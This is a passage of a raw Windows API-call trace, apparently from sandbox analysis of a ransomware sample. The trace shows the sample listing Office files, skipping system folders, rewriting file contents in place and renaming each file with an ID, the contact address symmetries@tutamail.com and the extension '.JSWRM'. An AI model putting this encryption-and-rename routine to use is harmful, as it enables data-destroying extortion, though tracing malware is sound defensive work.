1 [0116.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0116.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PREVIEWTEMPLATE2.POTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\previewtemplate2.potx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.266] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=298302) returned 1 [0116.266] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0116.266] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.279] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.279] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.280] CloseHandle (hObject=0x238) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0116.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0116.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0116.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0116.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0116.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0116.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.280] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PREVIEWTEMPLATE2.POTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\previewtemplate2.potx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PREVIEWTEMPLATE2.POTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\previewtemplate2.potx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0116.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0116.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0116.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0116.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0116.282] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x472474e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x472474e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x472474e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PRIMARY.CSS", cAlternateFileName="")) returned 1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2=".") returned 1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="..") returned 1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="...") returned 1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="windows") returned -1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="recovery") returned -1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="perflogs") returned 1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="documents and settings") returned 1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="system volume information") returned -1 [0116.282] lstrcmpiW (lpString1="PRIMARY.CSS", lpString2="msocache") returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRIMARY.CSS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRIMARY.CSS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRIMARY.CSS", lpUsedDefaultChar=0x0) returned 11 [0116.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0116.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRIMARY.CSS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRIMARY.CSS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRIMARY.CSS", lpUsedDefaultChar=0x0) returned 11 [0116.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0116.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0116.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0116.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0116.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PRIMARY.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\primary.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.283] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0116.283] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0116.284] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0116.285] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.285] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0116.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0116.286] CloseHandle (hObject=0x238) returned 1 [0116.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0116.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0116.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0116.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0116.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0116.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.286] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PRIMARY.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\primary.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PRIMARY.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\primary.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0116.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0116.287] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1cac944, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1cac944, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1cac944, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2cc70, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROPRPT.VSL", cAlternateFileName="")) returned 1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2=".") returned 1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="..") returned 1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="...") returned 1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="windows") returned -1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="recovery") returned -1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="perflogs") returned 1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="documents and settings") returned 1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="$RECYCLE.BIN") returned 1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="system volume information") returned -1 [0116.287] lstrcmpiW (lpString1="PROPRPT.VSL", lpString2="msocache") returned 1 [0116.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0116.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.VSL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.VSL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROPRPT.VSL", lpUsedDefaultChar=0x0) returned 11 [0116.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0116.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0116.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.VSL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.VSL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROPRPT.VSL", lpUsedDefaultChar=0x0) returned 11 [0116.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0116.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0116.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0116.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0116.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROPRPT.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\proprpt.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.288] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=183408) returned 1 [0116.288] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0116.289] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.493] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.493] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.494] CloseHandle (hObject=0x238) returned 1 [0116.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0116.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0116.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0116.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.495] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROPRPT.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\proprpt.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROPRPT.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\proprpt.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0116.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0116.496] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2577485, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x2577485, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2577485, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5c61, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PROPRPT.VSSX", cAlternateFileName="PROPRP~1.VSS")) returned 1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2=".") returned 1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="..") returned 1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="...") returned 1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="windows") returned -1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="recovery") returned -1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="perflogs") returned 1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="documents and settings") returned 1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0116.496] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="system volume information") returned -1 [0116.497] lstrcmpiW (lpString1="PROPRPT.VSSX", lpString2="msocache") returned 1 [0116.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0116.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.VSSX", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROPRPT.VSSX", lpUsedDefaultChar=0x0) returned 12 [0116.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0116.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0116.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.VSSX", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROPRPT.VSSX", lpUsedDefaultChar=0x0) returned 12 [0116.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0116.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0116.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0116.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0116.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROPRPT.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\proprpt.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.498] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23649) returned 1 [0116.498] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5c60) returned 0x24c1d0 [0116.498] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, 